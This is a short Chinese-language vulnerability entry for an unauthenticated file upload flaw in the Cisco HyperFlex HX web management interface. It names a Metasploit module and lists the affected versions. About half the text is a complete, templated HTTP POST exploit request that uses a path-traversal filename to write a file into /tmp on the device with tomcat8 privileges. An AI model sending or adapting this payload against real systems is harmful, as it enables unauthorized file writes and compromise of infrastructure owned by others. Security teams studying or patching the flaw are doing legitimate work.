Cisco HyperFlex HX 数据平台基于 Web 的管理界面中存在一个漏洞,该漏洞可能允许未经身份验证的远程攻击者将文件上传到受影响的设备。此漏洞是由于缺少上传功能的身份验证。攻击者可以通过向受影响的设备发送特定的 HTTP 请求来利用此漏洞。成功的利用可能允许攻击者使用 tomcat8 用户的权限将文件上传到受影响的设备。
Metasploit Module
exploit/linux/http/cisco_hyperflex_file_upload_rce
影响范围 :
HyperFlex HX <= 4.0
HyperFlex HX = 4.5
漏洞类型 :
文件上传
利用条件 :
1、用户认证:不需要用户认证
2、触发方式:远程
代码语言:javascript复制 POST /upload HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
Origin: {{RootURL}}
Referer: {{RootURL}}
-----------------------------253855577425106594691130420583
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
Content-Type: application/json
MyPasswdNewData->/api/tomcat
-----------------------------253855577425106594691130420583--